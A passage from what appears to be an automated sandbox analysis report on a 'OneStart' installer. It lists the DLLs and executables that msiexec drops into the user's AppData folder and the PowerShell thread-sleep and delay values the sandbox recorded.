          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5116Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6648Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5184Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3416Thread sleep count: 2768 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3416Thread sleep count: 1852 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4728Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3428Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1448Thread sleep count: 1541 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1500Thread sleep count: 910 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4016Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3180Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 624Thread sleep count: 2369 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5960Thread sleep count: 1392 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4840Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2368Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1180Thread sleep count: 3359 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1180Thread sleep count: 1962 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6420Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6528Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3372Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5480Thread sleep count: 3038 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6572Thread sleep count: 2555 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5372Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6816Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6216Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1312Thread sleep count: 2709 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1312Thread sleep count: 1810 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6684Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6616Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7028Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4292Thread sleep count: 1590 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4292Thread sleep count: 2179 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6624Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4352Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6208Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6448Thread sleep count: 2102 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6448Thread sleep count: 1517 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6760Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6040Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5216Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Globalization.Extensions.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Json.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.MemoryMappedFiles.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.NonGeneric.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\ScreenRecorderLib.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Reflection.Primitives.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.Specialized.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\Unity.Container.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Encoding.Extensions.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\Newtonsoft.Json.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Reflection.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_2.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.TextWriterTraceListener.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.WindowsAPICodePack.Shell.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.Watcher.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Tasks.Parallel.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.X509Certificates.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Extensions.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Principal.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.NameResolution.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.TypeConverter.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Console.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XmlDocument.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\netstandard.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Process.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Formatters.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Json.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.WebSockets.Client.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Encoding.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Pipes.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Debug.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\Unity.Abstractions.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Requests.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\updater.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Primitives.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XmlSerializer.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Resources.Reader.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Queryable.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Thread.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Buffers.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Tools.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Tasks.Extensions.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Win32.Primitives.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Handles.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Security.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Contracts.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XPath.XDocument.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\DBarCore.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Sockets.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Xml.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Algorithms.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Tasks.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Numerics.Vectors.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.NetworkInformation.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_1.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Dynamic.Runtime.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.FileVersionInfo.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.WebHeaderCollection.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XPath.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.StackTrace.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Globalization.Calendars.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Data.Common.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Claims.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Globalization.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.SecureString.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.TraceSource.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI112.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Primitives.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.RegularExpressions.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\HtmlAgilityPack.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Expressions.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Reflection.Extensions.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_codecvt_ids.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.DriveInfo.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\vcruntime140.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Csp.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.ReaderWriter.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Compression.ZipFile.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.AppContext.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.WindowsAPICodePack.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Compression.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Tracing.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\DBar.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Http.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Overlapped.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Memory.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\vccorlib140.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.WebSockets.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.UnmanagedMemoryStream.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Resources.Writer.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Parallel.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Resources.ResourceManager.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_atomic_wait.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.Concurrent.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Encodings.Web.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Xaml.Behaviors.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.Primitives.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Drawing.Primitives.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.Primitives.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.ObjectModel.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\FluentWPF.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.ThreadPool.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\Flurl.Http.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Ping.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\websocket-sharp.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Numerics.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XDocument.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\Flurl.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.InteropServices.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Bcl.AsyncInterfaces.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Encoding.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.IsolatedStorage.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.ValueTuple.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Timer.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\concrt140.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Primitives.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9297.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.EventBasedAsync.dllJump to dropped file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3168
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2692
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2062
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2470
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2824
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2044
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3914
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2989
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2606
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6055
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2768
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1852
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1541
